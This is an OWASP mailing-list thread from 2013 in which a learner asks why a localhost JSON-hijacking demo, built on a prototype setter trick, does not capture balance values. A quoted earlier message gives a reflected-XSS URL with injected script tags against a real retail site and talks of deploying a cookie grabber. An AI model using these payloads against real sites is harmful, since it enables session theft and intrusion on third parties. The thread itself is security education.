[OWASP-Security101] JSON with XSS and CSRF exploitation.

Chendil Kumar Manoharan mkchendil at gmail.com
Tue Apr 23 19:44:39 UTC 2013


Hi,

I am trying to learn about JSON hijacking. Here is the code for the
vulnerable site which sends the JSONArray and the code of the malicious
site which has the script to the vulnerable site.

Malicious site:

http://localhost:8888/  returns

<html>
   <body>
      <script type="text/javascript">
Object.prototype.__defineSetter__('Balance',
function(obj){alert(obj);});</script> <script
src="http://localhost:9999/"></script>
      <form name="myForm">
         <p><label>Form name:<input type="text" name="text1"
value="Beluga"></label>
         <p><input name="button1" type="button" value="Show Form Name"
 onclick="Object.prototype.Balance='test'"></p>
      </form>
   </body></html>

Vulnerable site: http://localhost:9999 returns

[{"Id":1,"Balance":3.14},{"Id":2,"Balance":2.72},{"Id":3,"Balance":1.62}]



When I launch the malicious site, I still get the alert with value test,
but I was expecting the value of Balance.

Can someone help me in understanding what is wrong in the code to simulate
JSON hijacking.

Thanks
Chendil


On Fri, Apr 19, 2013 at 8:13 AM, Shritam Bhowmick <
shritam.bhowmick at gmail.com> wrote:

> Hello, OWASP,
>
> I am on a project and trying to actually penetrate (demonstrate) a client
> about the seriousness of an XSS attack. The attack is on a JSON server.
> It's not accepting http methods so that i can deploy a cookie grabber to
> explain him, how serious is the problem
>
> This is the original link. I would really requst and love to get suggestion
> with what i can more to convey the CTO that this is a serious flaw?
>
>
> http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=%3Cb%3Eabcd1%3Cscript%3Ealert%280%29%3C/script%3E%3Cscript%3Ealert%28document.location%29%3C/script%3E%3Cscript%3Edocument.location=%22http://http://http://www.yahoo.com%22%3C/script%3E
>
> also this:
>
> www.snapdeal.com/gtcol?pc=
>
> I refereed to
> http://blog.spiderlabs.com/2012/09/json-hijacking-demystified.html
> but the point is I am not able to decide, what to do with it, is it
> supposed to do a CSRF attack? if, yes, how?
> --
>  Regards
> Shritam Bhowmick
> Security Analyst
> Lucideus Tech Pvt Ltd
>
> ------------------------------------------------------------------------------------------------------------------------------------------------------
>
> Follow us @ https://www.facebook.com/LucideusTech<
> http://www.google.com/url?q=https%3A%2F%2Fwww.facebook.com%2FLucideusTech&sa=D&sntz=1&usg=AFQjCNHIUwxfLLaHD-9JP0X99ELv6YzAVA
> >
>
> For any queries, contact us at
> info at lucideustech.com<
> https://mail.google.com/mail/h/1wlmfo278twm7/?&v=b&cs=wh&[email protected]
> >
> **  © Lucideus Tech Pvt Ltd. C-17 Safdarjung Development Area, Hauz Khas,
> Opposite IIT Delhi Main Gate, New Delhi, India 110016
>
> The information contained herein (including any accompanying documents) is
> confidential and is intended solely for the addressee(s). It may contain
> proprietary, confidential, privileged information or other information
> subject to legal restrictions. If you are not the intended recipient of
> this message, please do not read, copy, use or disclose this message or its
> attachments. Please notify the sender immediately and delete all copies of
> this message and any attachments. This e-mail message including
> attachment(s), if any, is believed to be free of any virus. However, it is
> the responsibility of the recipient to ensure for absence of viruses.
> Lucideus Tech shall not be held responsible nor does it accept any
> liability for any damage arising in any way from its use.
> _______________________________________________
> Security101 mailing list
> Security101 at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/security101
> List Run By OWASP
> List Admin: Michael.Coates at owasp.org
>


More information about the Security101 mailing list